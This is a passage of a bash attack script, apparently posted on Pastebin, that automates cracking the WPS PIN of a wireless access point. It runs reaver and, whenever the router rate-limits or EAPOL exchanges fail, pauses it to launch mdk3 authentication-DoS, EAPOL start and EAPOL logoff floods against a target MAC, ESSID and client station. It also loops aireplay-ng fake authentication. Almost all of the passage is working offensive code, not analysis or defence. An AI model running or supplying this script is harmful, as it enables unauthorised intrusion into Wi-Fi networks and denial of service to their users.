  378. gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
  379. sleep 0.5;
  380. fi
  381. if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
  382. gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e  "mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
  383. sleep 0.5;
  384. fi
  385. MDK3_KILLALL_1=`ps -A|grep mdk3`
  386. VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
  387. SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
  388. done
  389. ###
  390. while [ "$SUCCESSIVE_EAPOL_FAILURES" = "[!] WARNING: 25 successive start failures" -a -z "$MDK3_KILLALL_1" ]; do
  391. killall -STOP reaver
  392. echo -e "\e[36m\e[1mReaver detected 25 successive eapol failures!, pausing reaver and running flood attacks for 60 second!\e[0m" >> /etc/reaver_tmp.txt ;
  393. if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
  394. gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "timeout 60 mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "timeout 60 mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "timeout 60 mdk3 $MON3 a -a $MAC -s 200";
  395. sleep 60;
  396. fi
  397. if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
  398. gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e " timeout 60 mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
  399. sleep 60;
  400. fi
  401. if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
  402. gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e  "timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
  403. sleep 60;
  404. fi
  405. killall -CONT reaver;
  406. VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
  407. SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
  408. MDK3_KILLALL_1=`ps -A|grep mdk3`
  409. done
  410. ###
  411. VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
  412. SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
  413. if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -o "$SUCCESSIVE_EAPOL_FAILURES" =  "[!] WARNING: 25 successive start failures" ]; then
  414. killall mdk3 2> /dev/null
  415. fi
  416. done
  417. }
  418. ###########################################################################
  419. function TAIL {
  420. while :; do
  421. clear
  422. timeout 10 tail -n 100 -f  /etc/reaver_tmp.txt 2> /dev/null;
  423. clear
  424. AIREPLAY_RESET=`cat '/etc/aireplay_tmp.txt'|grep -w 'Switching to shared key authentication'`
  425. if [ -n "$AIREPLAY_RESET" ]; then
  426. killall aireplay-ng
  427. fi
  428. timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
  429. done
  430. }
  431. ###########################################################################
  432. function AIREPLAY {
  433. while :; do
  434. sleep 0.5;
  435. aireplay-ng $MON1 -1 100000000 -a "$MAC" -e "$ESSID" -Q -q3 2> /dev/null| tee /etc/aireplay_tmp.txt > /dev/null;
  436. done
  437. }
  438. ###########################################################################
  439. MDK3_MAIN_MENU
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!